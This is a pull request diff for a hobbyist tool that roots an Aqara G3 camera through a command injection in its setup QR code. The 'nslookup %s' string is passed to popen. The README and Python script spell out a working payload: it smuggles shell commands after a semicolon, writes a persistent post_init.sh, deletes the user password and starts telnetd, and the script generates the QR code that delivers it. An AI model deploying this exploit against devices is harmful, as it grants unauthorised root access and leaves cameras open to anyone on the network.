### PR TITLE
v0.2

### DIFF
--- a/README.md
+++ b/README.md
@@ -8,9 +8,13 @@
 
 Intro
 ---------------
-I was disappointed to see the Aqara G3 camera did not ship with telnet enabled so I managed to grab a copy of a firmware update for some good 'ol static analysis which confirmed none of the previous methods were going to work. Whilst going through  "ha_master" I did see that one of the variables passed in by the setup qrcode is thrown through sprintf as "nslookup %s" and subsequently passed to popen. (yay)
-Getting telnet was fairly trivial, getting persistent telnet in one shot within the 132 char sprintf buffer and on a readonly filesystem was a little more challenging.
-(Aqara have also changed their key ciphering for ssid and pwd)
+I was disappointed to see the Aqara G3 camera did not ship with telnet enabled so I managed to grab a copy of a firmware update for some good 'ol static analysis which confirmed none of the previous methods were going to work.
+
+Whilst going through  "ha_master" I did see that one of the variables passed in by the setup qrcode is thrown through sprintf as "nslookup %s" and subsequently passed to popen (yay).
+
+Getting telnet was fairly trivial, getting persistent telnet in one shot within the 132 char sprintf buffer on a readonly filesystem was a little more challenging.
+
+Thankfully another qrcode variable (b aka bind_key) has a larger buffer so we store some data in this which can later be used by the main payload.
 
 
 Usage

--- a/README.md
+++ b/README.md
@@ -57,18 +57,16 @@ Payload Explanation
 ---------------
 ```python
 payload=[
-    'x="fw_man"ager.sh',                    # Workaround - Script checks if it's already running by grepping ps.
     'y=/data/scripts/post_init.sh',         
-    '$x -t -f',                             # Create default /data/scripts/post_init.sh
-    'z=`agetprop persist.app.bind_key`',    # post_init below exploits bind_key for additional storage
-    'echo -e $z>$y',                        # Write the contents to /data/scripts/post_init.sh
-    'tail -n2 $y|sh'                        # Clear $USER password, enable tty and start telnetd
+    '"fw_man"ager.sh -t -f',                        # Create default /data/scripts/post_init.sh
+    'echo -e `agetprop persist.app.bind_key`>$y',   # Write post_init[] content below to post_init.sh
+    'tail -n2 $y|sh'                                # Clear $USER password, enable tty and start telnetd
 ],
 post_init = [
-    '#\\x21/bin/sh',                        # Due to 'echo -e' in payload we need to ensure ! is not evaluated
-    'fw_manager.sh -r',                     # Start firmware as normal
-    'passwd -d $USER',                      # Clear $USER password
-    'fw_manager.sh -t -k'                   # Enable tty and start telnetd
+    '#!/bin/sh',
+    'fw_manager.sh -r',                             # Start firmware as normal
+    'passwd -d $USER',                              # Clear $USER password
+    'fw_manager.sh -t -k'                           # Enable tty and start telnetd
 ],
 }
 ```

--- a/aQRootG3.py
+++ b/aQRootG3.py
@@ -10,29 +10,21 @@ __license__ = "MIT"
 
 
 def cipher(data):
-    iArr = [[-128, -48, 33, 164], [-47, 32, 34, 84], [33, 35, -1, 0], [127, 127, 35, -91]]
-    out = ""
-    for c in data:
-        for j in iArr:
-            if j[0] > c or j[1] < c:
-                continue
-            out += (j[2] if j[2] != -1 else c) + j[3] + c
-        out += chr(0xA2 - c)
-    return out
+    return "".join([chr(0xa2 - ord(c)) for c in data])
 
 
 def generate_payload(ssid, pwd, payload, post_init):
     """
     qrcode buffer is [1024]
     nslookup sprintf buffer [132]
-    "nslookup domain;<payload>0x00"
+    "nslookup a;<payload>0x00"
     """
     payload.insert(0, 'a')
     qrcode_data = {
         "b": "\\n".join(post_init),
         "d": ";".join(payload),
-        "x": cipher(ssid.encode()),
-        "y": cipher(pwd.encode()),
+        "x": cipher(ssid),
+        "y": cipher(pwd),
         "l": "en",
     }
     payload_string = "&".join([f"{k}={v}" for k, v in qrcode_data.items()])
@@ -45,9 +37,9 @@ def generate_payload(ssid, pwd, payload, post_init):
 
 def gen_qrcode(data, outfile=None):
     qrcode = segno.make(data, error="h")
-    qrcode.terminal(compact=True, border=10)
+    qrcode.terminal(compact=True, border=5)
     if outfile:
-        qrcode.save(outfile, border=10, scale=8)
+        qrcode.save(outfile, border=5, scale=8)
 
 
 def main(args):


### PR DESCRIPTION
- Expand payload storage by utilising bindkey (b) in qrcode.
- Change post_init.sh payload to mimic standard startup from /etc/init.d/S90app
- Delete password for root/admin as some units seemingly have a non blank password set
- Simplify cipher since we're only bothered about ascii (camera probably doesn't support unicode ssid anyway)